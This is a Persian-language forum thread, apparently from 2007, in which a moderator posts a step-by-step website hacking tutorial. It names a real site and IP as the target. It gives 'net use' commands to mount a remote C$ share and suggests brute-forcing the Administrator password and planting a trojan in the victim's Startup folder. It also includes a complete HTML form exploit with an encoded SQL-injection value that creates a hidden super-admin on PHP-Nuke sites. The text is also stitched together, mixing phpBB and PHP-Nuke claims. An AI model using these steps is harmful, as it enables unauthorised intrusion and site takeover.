كنترل پنل             جستجو               پرسشهای متداول            .:: آخرین پست‌های انجمن ::.            لیست اعضا            مدیران سایت             درجات        ورود
فهرست انجمن‌ها -> اينترنت -> مسائل مربوط به هكينگ و امنيت
پاسخ دادن به این موضوع
آموزش هك كردن سايت
پست تاریخ: یکشنبه 24 دی 1385 - 14:06    
Gytyonline
مديريت كل انجمن‌ها
مديريت كل انجمن‌ها


پست: 899
عضو شده در: 14 شهریور 1384
محل سکونت: tehran
iran.gif


امتياز: 8184

عنوان: آموزش هك كردن سايت خواندن مشخصات فردی ارسال پیام شخصی ارسال email

سلام دوستان اميدوارم الان براي هك كردن يك فروم phpbb آماده باشيد .


من يك روش رو براتون معرفي مي كنم . تا آخر كار با هم مي ريم.

حتما جهت هك كردن سايت از phpnuke بودن اون حتما مطلع باشيد .

هك كردن يك كمي سخته ولي با كمي حوصله و دقت به نتيجه مي رسيد .

شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که
خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... )

اول بايد ip سايت مورد نظرتون رو پيدا كنيد مثلا سايت

http://www.tadarokestan.com/

براي بدست آوردن ip اين سايت من به اين روش عمل مي كنم.


روش whois : براي استفاده از اين روش من در مرورگرم دستور زير را تايپ مي كنم.


http://www.samspade.org/t/ipwhois?a=xxxxxx كه بجاي
xxxxxx

آدرس tadarokestan.com را وارد مي كنم. بعد آدرس ip سايت رو از

آدرس
http://www.samspade.org/t/ipwhois?a=tadarokestan.com

دريافت مي كنم . كه ip سايت ( 64.207.218.217) مي باشد . از عبارت
tadarokestan.com = [ 64.207.218.217 ]

خوب حالا تونستيم ip سايت رو از بهترين روش پيدا كنيم . حالا شروع مي كنيم.

از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:

Net use x: \\IP\DriveName$

من حرف X رو براي اين گذاشتم كه شما بجاي اون هر حرفي بجز درايو هاي خودتون بگذاريد . مثلا w

بجاي ip تو آدرس هم مي توانيد آدرس ip كه بدست آورده ايد قرار بدهيد . مثلا ( 64.207.218.217)

بجاي DriveName مي توانيد اون درايوي رو مي خواهيد Share كنيد بنويسيد . من يك نمونه براتون آماده كردم .


Net use w: \\64.207.218.217\c$ خوب حالا اگه User Name و Password از شما نخواهد درايو براحتي Share

مي شود . و اين پيغام رو براتون مي زنه .....The command completed successfully و اگر از شما User Name و Password

خواست شما يورز رو Administrator بزنيد و پ پسورد هم میتوانید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.

اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت
کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز)

حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....

هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما
اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد
فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل
(کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin )
یاد بگیریم! اول باید بفهمیم که نوک چیست؟

پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز
برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke

این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می
کند.
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>

خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!
آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين آفرين

[ وضعيت كاربر: ]

تشکر کردن از پست  پاسخگویی به این موضوع بهمراه نقل قول 
تشکرها از این پست: yadegar (سه‌شنبه 26 دی 1385 - 14:19)

پست تاریخ: یکشنبه 24 دی 1385 - 14:14    
Gytyonline
مديريت كل انجمن‌ها
مديريت كل انجمن‌ها


پست: 899
عضو شده در: 14 شهریور 1384
محل سکونت: tehran
iran.gif


امتياز: 8184

عنوان: خواندن مشخصات فردی ارسال پیام شخصی ارسال email

راستی با این روش هم می شود آفتبگردون رو هم هک کرد
(پس همگی بریم این سایت روهک کنیم) {شوخی کردم} خنده به تمام معنا Laughing Razz
(اسم سایت : http://www.aftab.cc) خنده به تمام معنا خنده به تمام معنا

[ وضعيت كاربر: ]

تشکر کردن از پست  پاسخگویی به این موضوع بهمراه نقل قول 
تشکرها از این پست:

پست تاریخ: یکشنبه 1 بهمن 1385 - 23:35    
syadate
داره كولاك مي‌كنه!
داره كولاك مي‌كنه!


پست: 114
عضو شده در: 30 بهمن 1384
محل سکونت: mashhad
blank.gif


امتياز: 1125

عنوان: خواندن مشخصات فردی ارسال پیام شخصی

جالب بود مرسی ! Twisted Evil Arrow خشمگين Mr. Green Neutral

[ وضعيت كاربر: ]

تشکر کردن از پست  پاسخگویی به این موضوع بهمراه نقل قول 
تشکرها از این پست:


نمایش پستها:                 مشاهده موضوع قبلی :: مشاهده موضوع بعدی  
پاسخ دادن به این موضوع
 

صفحه 1 از 1

تمام زمانها بر حسب GMT + 3.5 Hours می‌باشند
 Related Topics 


 information 

 

پرش به:  
شما نمی توانید در این بخش موضوع جدید پست کنید
شما نمی توانید در این بخش به موضوعها پاسخ دهید
شما نمی توانید موضوع های خودتان را در این بخش ویرایش کنید
شما نمی توانید موضوع های خودتان را در این بخش حذف کنید
شما نمی توانید در این بخش رای دهید


Copyright 2004-2024. All rights reserved.
© by Aftabgardan Cultural Center : Aftab.cc